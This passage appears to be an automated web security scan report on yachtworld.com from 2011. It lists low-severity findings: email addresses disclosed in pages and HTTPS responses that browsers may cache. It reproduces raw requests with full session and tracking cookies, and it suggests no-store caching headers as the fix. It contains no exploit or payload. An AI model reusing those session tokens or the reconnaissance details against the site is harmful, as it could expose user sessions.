boats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">

<head>

<STYLE type="text/css">

<
...[SNIP]...
<a href="http://yachtworld.com/legendary/email.cgi?url=legendary&email=info@legendarymarine.com">info@legendarymarine.com</a>
...[SNIP]...
<a href="mailto:eanderson@legendarymarine.com">eanderson@legendarymarine.com</a>
...[SNIP]...

15.54. https://www.yachtworld.com/core/globalnav/privacy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/privacy.jsp

Issue detail

The following email addresses were disclosed in the response:

cs@yachtworld.com
policies@yachtworld.com

Request

GET /core/globalnav/privacy.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="mailto:policies@yachtworld.com">policies@yachtworld.com</a>
...[SNIP]...
<a href="mailto:cs@yachtworld.com">cs@yachtworld.com</a>
...[SNIP]...
<a href="mailto:policies@yachtworld.com">policies@yachtworld.com</a>
...[SNIP]...

15.55. https://www.yachtworld.com/core/globalnav/termOfUse.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/termOfUse.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /core/globalnav/termOfUse.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:39 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="mailto:copyright@yachtworld.com">copyright@yachtworld.com</a>
...[SNIP]...

15.56. https://www.yachtworld.com/core/listing/cache/searchResults.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /core/listing/cache/searchResults.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:50 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

               <titl
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

16. Cacheable HTTPS response previous next
There are 21 instances of this issue:

/
/boat-loans/forgot_password.jsp
/boat-loans/index.jsp
/boat-loans/myLoan.jsp
/byp/categories/BrokerageSales/BoatDealers.html.en
/byp/categories/BrokerageSales/YachtBrokerageFirms.html.en
/byp/categories/Surveyors/index.html.en
/byp/searchbyp.cgi.en
/core/globalnav/contactUs.jsp
/core/globalnav/copyright.jsp
/core/globalnav/emailForm.jsp
/core/globalnav/help.jsp
/core/globalnav/localeSelect.jsp
/core/globalnav/privacy.jsp
/core/globalnav/termOfUse.jsp
/core/listing/advancedSearch.jsp
/core/listing/cache/searchResults.jsp
/core/personalboatshopper/pbs.jsp
/core/services/services.jsp
/globalnav/sitemap.html.en
/leaving_yw.cgi

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

16.1. https://www.yachtworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

16.2. https://www.yachtworld.com/boat-loans/forgot_password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/forgot_password.jsp

Request

Response

16.3. https://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/index.jsp

Request

Response

16.4. https://www.yachtworld.com/boat-loans/myLoan.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/myLoan.jsp

Request

Response

16.5. https://www.yachtworld.com/byp/categories/BrokerageSales/BoatDealers.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/byp/categories/BrokerageSales/BoatDealers.html.en

Request

GET /byp/categories/BrokerageSales/BoatDealers.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-